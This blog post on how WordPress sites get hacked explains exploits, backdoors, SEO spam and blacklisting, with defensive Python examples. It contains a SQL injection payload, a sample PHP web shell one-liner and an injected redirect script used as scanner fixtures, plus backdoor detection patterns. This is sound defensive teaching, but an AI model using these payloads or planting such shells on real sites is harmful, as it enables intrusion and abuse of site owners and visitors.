Introduction
Your website has been hacked. What now? You are not alone: many SME owners and freelancers with a WordPress site go through this at some point. Hackers rarely pick you out as a target; they scan the internet en masse for vulnerable websites. In other words, if your site has a weak spot, it can fall victim to an automated attack. In this blog post we walk step by step through a typical WordPress hack scenario. We discuss four phases, from the break-in to the blacklist, and explain the technical terms along the way in plain language. No panic or scare tactics, just realistic information about what can happen and how you can prevent it.
Step 1: Exploit – breaking in through a vulnerability
Every hack starts with a weak spot. A vulnerability (security flaw) in a plugin, theme or WordPress itself is discovered and abused; the code or technique that abuses it is called an exploit. Compare it to a burglar who finds an open window in your house. Reports from security vendors put a plugin or theme vulnerability behind more than 60% of hacked WordPress sites, usually an outdated plugin with a publicly known flaw. Think of a file upload vulnerability (the attacker can upload any file, including a PHP script, because the upload is not checked properly) or a SQL injection (input from a form ends up inside a database query, so the attacker can add their own database commands). Through such a flaw a hacker can silently break into your site and, for example, drop a script or create an account with administrator rights. This first break-in usually happens fully automatically: bots scour the internet for known vulnerabilities and attack every vulnerable site they find.
Practical example: in 2020 a vulnerability in the popular File Manager plugin was actively exploited. Security company Wordfence counted more than 1.7 million attacks in a few days via this single plugin flaw. You can imagine what happens if your site runs that vulnerable plugin: the door is wide open. Once inside, the attacker can run their own code on your server (this is called Remote Code Execution, RCE). With a SQL injection they can read or modify the database, so customer data or password hashes can be stolen. In short, step 1 is the break-in: the hacker gains access to your site via a weak spot that could have been closed, for example by updating in time.
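To make the SQL injection from step 1 concrete, here is an added example (not code from the original post, and not from any real plugin): a login check written the vulnerable way and the safe way. Python's built-in sqlite3 stands in for the PHP and MySQL a WordPress plugin would use; the user table, the passwords and the payload are constructed for the demo.

```python
# Added example: how a SQL injection through a form field works, and how a
# parameterised query closes it. sqlite3 stands in for the PHP/MySQL code a
# vulnerable plugin would contain. All data below is constructed for the demo.
import sqlite3


def make_db():
    """Constructed sample database: two users, one of them an administrator."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin", "S3cret!", "administrator"), ("editor", "hunter2", "editor")],
    )
    return conn


def login_vulnerable(conn, login, password):
    """The flaw: form fields are pasted straight into the SQL string, so quote
    characters typed by the visitor become part of the query itself."""
    sql = (
        f"SELECT login, role FROM users "
        f"WHERE login = '{login}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchall()


def login_safe(conn, login, password):
    """The fix: placeholders. The database receives the query text and the
    values separately, so input can never change the query's structure.
    (In WordPress the equivalent is $wpdb->prepare().)"""
    sql = "SELECT login, role FROM users WHERE login = ? AND password = ?"
    return conn.execute(sql, (login, password)).fetchall()


def demo():
    """Run the classic payload against both versions and return both results."""
    conn = make_db()
    # Typed into the password field, this turns the WHERE clause into
    #   login = 'admin' AND password = '' OR '1'='1'
    # and the OR makes the condition true for every row in the table.
    payload = "' OR '1'='1"
    hacked = login_vulnerable(conn, "admin", payload)
    safe = login_safe(conn, "admin", payload)
    return hacked, safe


if __name__ == "__main__":
    hacked, safe = demo()
    print("vulnerable query returned:", hacked)   # every user, no password needed
    print("parameterised query returned:", safe)  # nothing: the payload is just a wrong password
```

The vulnerable version hands back every account in the table without a valid password; the parameterised version treats the same text as an ordinary (wrong) password and returns nothing. The same payload shape works against any query that glues user input into SQL, which is why scanners can try it against thousands of sites blindly.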
Step 2: Persistence – the attacker stays present
Now that the intruder is inside, they want to stay. In this phase the attacker makes sure of a persistent presence, even if you patch the original vulnerability. One common trick is installing a backdoor, literally a “back door” into your website: hidden malicious code (a fake plugin, or an extra PHP file tucked in among legitimate ones) that lets the hacker back in at any time. Compare it to a burglar who secretly leaves a key under your doormat; after the first break-in they can get in again whenever they like. The hacker often also creates a hidden administrator account in WordPress. If you find and delete that user, the backdoor simply recreates it. Every time you throw the intruder out, their back door lets them back in.

A hacker installs a hidden backdoor in WordPress to keep access. Via such a backdoor, they can, for example, recreate an administrator account every time you remove it.
In practice we see all kinds of clever persistence techniques. Backdoors are disguised as legitimate files or plugins. One example is the fake DebugMaster plugin, which posed as a debugging tool while it created hidden admin users and exfiltrated data. Hackers also inject code into crucial files such as wp-config.php, or into the database, so their instructions run on every page load. The result: the attacker is nested deep in your site, and a simple cleanup such as deleting one suspicious file is usually not enough. The site keeps getting reinfected until every backdoor has been found and removed, which is why a full scan of files and database, or a restore from a known-clean backup, is the usual remedy.
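As an added example (not from the original post or from any product), here is a small scan for the persistence tricks described in step 2. It walks a WordPress directory and reports PHP files in places or shapes they should not have: code inside the uploads folder, eval/base64 obfuscation chains, command execution fed from request input, and lines appended to wp-config.php after the wp-settings.php include. The sample site it scans is constructed in a temporary folder, and the indicator list is a starting point for a manual review, not a complete malware signature set.

```python
# Added example: a minimal backdoor indicator scan for a WordPress tree.
# Every hit is something to inspect, not proof of compromise: a few legitimate
# plugins use some of these constructs too. The sample site is constructed.
import os
import re
import tempfile

SUSPICIOUS = [
    (re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("),
     "eval() of decoded/obfuscated code"),
    (re.compile(r"\b(eval|assert)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b"),
     "eval()/assert() of request input"),
    (re.compile(r"\b(system|passthru|shell_exec|exec|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b"),
     "shell command built from request input"),
    (re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/[a-zA-Z]*e[a-zA-Z]*['\"]"),
     "preg_replace() with /e modifier (code execution)"),
    (re.compile(r"\bcreate_function\s*\("),
     "create_function() (removed in PHP 8, common in backdoors)"),
    (re.compile(r"\b(wp_insert_user|wp_create_user)\s*\("),
     "creates WordPress users (legitimate in some plugins, check why)"),
]
PHP_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
COMMENT_PREFIXES = ("//", "#", "*", "/*", "*/", "?>")


def check_wp_config(rel, code):
    """wp-config.php normally ends by loading wp-settings.php. Code after that
    line is a favourite hiding place for an include of a backdoor."""
    lines = code.splitlines()
    idx = next((i for i, line in enumerate(lines) if "wp-settings.php" in line), None)
    if idx is None:
        return [(rel, "wp-config.php does not load wp-settings.php (rewritten?)")]
    trailing = [line for line in lines[idx + 1:]
                if line.strip() and not line.strip().startswith(COMMENT_PREFIXES)]
    return [(rel, "code after the wp-settings.php include")] if trailing else []


def scan_tree(root):
    """Return sorted (relative_path, reason) pairs for everything worth a look."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not PHP_EXT.search(name):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            # Uploads hold media, never code: PHP here is almost always a dropped shell.
            if rel.startswith("wp-content/uploads/"):
                findings.append((rel, "PHP file inside wp-content/uploads"))
            with open(path, encoding="utf-8", errors="replace") as fh:
                code = fh.read()
            for pattern, reason in SUSPICIOUS:
                if pattern.search(code):
                    findings.append((rel, reason))
            if rel == "wp-config.php":
                findings.extend(check_wp_config(rel, code))
    return sorted(findings)


def build_sample_site():
    """Constructed WordPress tree: one clean plugin, one dropped shell in the
    uploads folder, one tampered wp-config.php. Returns the root path."""
    root = tempfile.mkdtemp(prefix="wp-demo-")
    files = {
        "wp-content/plugins/hello/hello.php":
            "<?php\n/* Plugin Name: Hello */\nadd_action('init', function () { echo 'hi'; });\n",
        "wp-content/uploads/2024/05/thumb.php":
            "<?php @eval(base64_decode($_POST['z'])); ?>",
        "wp-config.php":
            "<?php\ndefine('DB_NAME', 'wp');\n"
            "require_once ABSPATH . 'wp-settings.php';\n"
            "@include_once '/tmp/.cache/x.php';\n",   # injected after the normal last line
    }
    for rel, content in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, reason in scan_tree(build_sample_site()):
        print(f"{rel}: {reason}")
```

Run it against a real site by calling scan_tree() with the WordPress root. Pair the file scan with a look at the user list (every administrator account should be one you recognise) and with a comparison of core and plugin files against fresh copies from wordpress.org, since a backdoor hidden inside an otherwise genuine plugin file will not match any of the patterns above.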
Step 3: Spam and malware – abuse of your site
Once the attacker has a foothold, they start abusing your WordPress site for their own gain. Usually malware is placed: malicious code that, for example, sends spam or alters your web pages. A well-known phenomenon is SEO spam: the site is stuffed with hidden text or links to boost the Google ranking of fraudulent sites. The notorious WordPress pharma hack is an example, where your website quietly advertises fake medicines such as Viagra and Cialis. You don't see it yourself, but Google suddenly sees spammy keywords all over your domain. This is also called black hat SEO.
Another sign is that visitors experience strange behavior on your site. Hackers regularly place scripts that only run for ordinary visitors and not for a logged-in administrator, so that you, the owner, notice nothing. Such a script can redirect every visitor to another, dangerous website or show pop-ups with malware downloads. In one case study, injected external JavaScript loaded for all visitors except administrators and a list of known IP addresses, and was used to spread malware. Backdoors can also stay hidden among normal files so the attacker can regain access later (see step 2).
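Because the cloaked injection in step 3 hides from the logged-in owner, the check is to look at your own site the way a stranger does. The added example below (not from the original post) fetches the same page as an anonymous visitor and as the owner, and lists script sources that appear in only one copy, plus any external script host you did not put there yourself. The two HTML documents and the host names are constructed for the demo; fetch() is only used when you point it at a real site.

```python
# Added example: detect scripts that are served to anonymous visitors but not
# to the site owner (cloaking), and external script hosts you did not add.
# The HTML samples and hosts below are constructed; fetch() is for real sites.
from html.parser import HTMLParser
from urllib.parse import urlparse
from urllib.request import Request, urlopen


class ScriptCollector(HTMLParser):
    """Collect the src of every <script> tag and the body of every inline one."""

    def __init__(self):
        super().__init__()
        self.srcs = []
        self.inline = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline.append(data.strip())


def script_sources(html):
    parser = ScriptCollector()
    parser.feed(html)
    return set(parser.srcs), parser.inline


def foreign_hosts(srcs, own_hosts):
    """Script hosts that are neither your domain nor a CDN you knowingly use."""
    return {urlparse(s).netloc.lower() for s in srcs
            if urlparse(s).netloc and urlparse(s).netloc.lower() not in own_hosts}


def compare(visitor_html, admin_html, own_hosts):
    """Differences between what a visitor gets and what the owner gets."""
    v_srcs, v_inline = script_sources(visitor_html)
    a_srcs, a_inline = script_sources(admin_html)
    return {
        "visitor_only_srcs": sorted(v_srcs - a_srcs),
        "visitor_only_inline": [s for s in v_inline if s not in a_inline],
        "foreign_hosts": sorted(foreign_hosts(v_srcs | a_srcs, own_hosts)),
    }


def fetch(url, user_agent, cookie=None):
    """Download a page with a chosen User-Agent and, optionally, your login cookie.
    Network access only; not used by the offline demo below."""
    headers = {"User-Agent": user_agent}
    if cookie:
        headers["Cookie"] = cookie
    with urlopen(Request(url, headers=headers), timeout=15) as resp:
        return resp.read().decode("utf-8", errors="replace")


# Constructed pages: the visitor copy carries an extra tracker and a redirect.
OWN_HOSTS = {"shop.example.com", "cdn.jsdelivr.net"}
VISITOR_HTML = """<html><head>
<script src="https://shop.example.com/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/some-lib@1/dist/lib.min.js"></script>
<script src="https://stat.track-visitors.test/l.js"></script>
<script>window.location='https://offer.fake-pharma.test/';</script>
</head><body>Welcome</body></html>"""
ADMIN_HTML = """<html><head>
<script src="https://shop.example.com/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/some-lib@1/dist/lib.min.js"></script>
</head><body>Welcome</body></html>"""

if __name__ == "__main__":
    for key, value in compare(VISITOR_HTML, ADMIN_HTML, OWN_HOSTS).items():
        print(f"{key}: {value}")
```

For a live check, call fetch() once with a common browser User-Agent and no cookie, once with your wordpress_logged_in cookie, and once with a Googlebot User-Agent, then feed the copies to compare(). Anything that shows up only in the anonymous copy, or any script host you cannot account for, deserves the same scrutiny as the backdoor hits from step 2.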
The consequences are serious; your hard work and reputation are at stake. Imagine your site suddenly sending hundreds of spam emails or being full of invisible Viagra links: that damages your reputation and scares customers away. Search engines can penalize you with a lower ranking or show a warning like “This site may be hacked.” Your website can also be used as part of a larger botnet to carry out attacks on others. Your domain and server can end up on spam lists, so that emails from your site no longer reach customers (if a hacker uses your server as a mail relay for spam, your IP address is blacklisted quickly). In short, in this phase your website changes from a digital business card into a source of malware and spam on the internet, often without you noticing right away.
Step 4: Blacklist – the site gets blocked or flagged
Eventually the hack's malicious activity does not go unnoticed. Major parties such as Google, browser vendors and mail providers want to protect their users and will blacklist a hacked website. Google Safe Browsing detects thousands of unsafe sites (malware or phishing) every day and flags them with clear warnings. You may have seen it yourself: a bright red page saying "Deceptive site ahead" or "This site may harm your computer." Such a warning means Google considers your site unsafe because of malware or spam; visitors coming from Google see it and most leave immediately. Google also adds a “This site may be hacked” label in search results and, in serious cases, removes your site from the index entirely, so your pages disappear from search results. Antivirus software and the browsers that use the Safe Browsing list (Chrome, Firefox and Safari among them) block access to your domain as well.
Besides Google, email services and hosting providers react too. If your site has become known as a spam or phishing source, your emails no longer pass spam filters: Gmail and Outlook refuse mail from your domain or put it in the spam folder. In the background your IP address or domain name is added to international blocklists (DNS-based blacklists such as Spamhaus, and Google's Safe Browsing list). Getting off a blacklist means first proving that you have cleaned up and are safe, and then requesting delisting from each list separately, which takes time and expertise. In the meantime you lose almost all your visitors and incoming messages: a disastrous situation for any entrepreneur.
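The mail-side blacklisting in step 4 can be checked directly, and knowing how makes the delisting process less mysterious. The added example below (not from the original post) shows the mechanism: DNS-based blocklists are queried by reversing the octets of your server's IP address and looking the name up under the list's zone; a 127.0.0.x answer means "listed", and the last octet says why. The return-code meanings are those Spamhaus publishes for its ZEN list; the IP address is a constructed documentation address, and the live lookup needs network access.

```python
# Added example: build and interpret a DNSBL lookup for a mail server's IP.
# Codes are Spamhaus ZEN's published return codes. The sample IP is constructed
# (203.0.113.0/24 is reserved for documentation), so it will never be listed.
import socket

ZEN_CODES = {
    "127.0.0.2": "SBL: listed as a spam source",
    "127.0.0.3": "SBL CSS: snowshoe or compromised-host spam",
    "127.0.0.4": "XBL: exploited/infected machine",
    "127.0.0.5": "XBL: exploited/infected machine",
    "127.0.0.6": "XBL: exploited/infected machine",
    "127.0.0.7": "XBL: exploited/infected machine",
    "127.0.0.9": "SBL DROP: hijacked or criminal netblock",
    "127.0.0.10": "PBL: end-user range that should not send mail directly (ISP policy)",
    "127.0.0.11": "PBL: end-user range that should not send mail directly (Spamhaus policy)",
}
QUERY_ERRORS = {
    "127.255.255.252": "typo in the query name",
    "127.255.255.254": "query from a public resolver or without a free-use key; use your own resolver",
    "127.255.255.255": "query limit exceeded",
}


def dnsbl_name(ip, zone):
    """203.0.113.5 on zen.spamhaus.org -> '5.113.0.203.zen.spamhaus.org'."""
    octets = ip.split(".")
    if len(octets) != 4 or not all(o.isdigit() and 0 <= int(o) <= 255 for o in octets):
        raise ValueError(f"not an IPv4 address: {ip!r}")
    return ".".join(reversed(octets)) + "." + zone


def interpret(answer):
    """Turn a 127.x.x.x answer into a human-readable reason."""
    if answer in QUERY_ERRORS:
        return "query error: " + QUERY_ERRORS[answer]
    if answer in ZEN_CODES:
        return "listed, " + ZEN_CODES[answer]
    if answer.startswith("127."):
        return f"listed with unknown code {answer}"
    return f"unexpected answer {answer} (not a DNSBL response)"


def check(ip, zone="zen.spamhaus.org"):
    """Live lookup. Returns (query_name, reasons); an empty list means not listed."""
    name = dnsbl_name(ip, zone)
    try:
        answers = {info[4][0] for info in socket.getaddrinfo(name, None, socket.AF_INET)}
    except socket.gaierror:
        return name, []          # NXDOMAIN: the address is not on this list
    return name, [interpret(a) for a in sorted(answers)]


if __name__ == "__main__":
    name, reasons = check("203.0.113.5")
    print(name, "->", reasons or ["not listed"])
```

Run check() with your mail server's real public IP and repeat it for other lists your bounce messages mention (each list has its own zone and its own delisting form). For the Google side there is no DNS trick: the Security Issues report in Google Search Console and the Safe Browsing site status page at transparencyreport.google.com show whether your domain is flagged and, after cleanup, are where you request a review.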
Finally: how can you protect yourself?
This scenario may sound like a nightmare, but there is a lot you can do to prevent it. Keeping WordPress core, plugins and themes up to date is step one: most hacks go through flaws that were patched long ago but never updated on the hacked site. A good security plugin and regular backups stored away from the server are indispensable for a quick response when something does go wrong, and strong passwords with two-factor authentication on administrator accounts take away the easiest follow-up for an attacker who gets a foothold. Do you not have the time or knowledge to keep up with all this yourself? No worries. Managed WordPress hosting services (such as those from Jorijn Schrijvershof) handle the technical management, security and hack recovery for you. Such a service keeps your site proactively safe and up to date, and steps in if something does happen, so you can run your business with peace of mind, without sleepless nights over malware on your site. Safety first, peace of mind.